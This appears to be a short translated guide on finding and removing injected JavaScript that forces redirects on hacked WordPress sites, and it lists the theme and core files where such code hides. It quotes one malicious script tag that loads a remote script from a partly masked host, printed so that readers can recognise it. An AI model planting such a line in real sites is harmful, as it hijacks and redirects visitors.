If your WordPress site has been hacked and you think you have removed the tampering, but the site still redirects (forcibly) to another site, the malformed JAVASCRIPT code may still be there somewhere.
Embedding a single line of invalid JAVASCRIPT
The following code is embedded malicious JAVASCRIPT code (malware).
<script src="dock.********.com/m.js?ns=ns1" type="text/javascript"></script>
With just one line of code, this code calls and executes an external malicious script.
In general, this type of malicious embedding is difficult to detect by malware disinfection plug-ins and inspections because of the wide variety of callers and the weasel-word situation.
However, since Javascripts invoked from outside cannot rewrite or edit site files, they are less dangerous than dangerous PHP programs called backdoors.
Therefore, it is possible to find the above malicious code and remove it by simply deleting this one line.
How to find JAVASCRIPT injection
This single line of malicious JAVASCRIPT code is often embedded in a file that is always loaded when WordPress is called.
This is because hackers want to maximize their profits by redirecting users on every page of the defaced site.
Such files that are always loaded in WordPress are the following.
wp-config.php
index.php
header.php of the theme
theme’s footer.php
functions.php in theme
index.php in theme
sidebar.php in theme
Visually inspect for the presence of a single line of unrecognizable JS code like the one shown above here.
Examples embedded in the database
There are also rare cases where such JAVASCRIPT is embedded in the database.
In this case, a large amount of incorrect JAVASCRIPT code is written to database posts, and it is useful to use the Database Batch Search and Replace plugin to find and delete the incorrect code.
Search by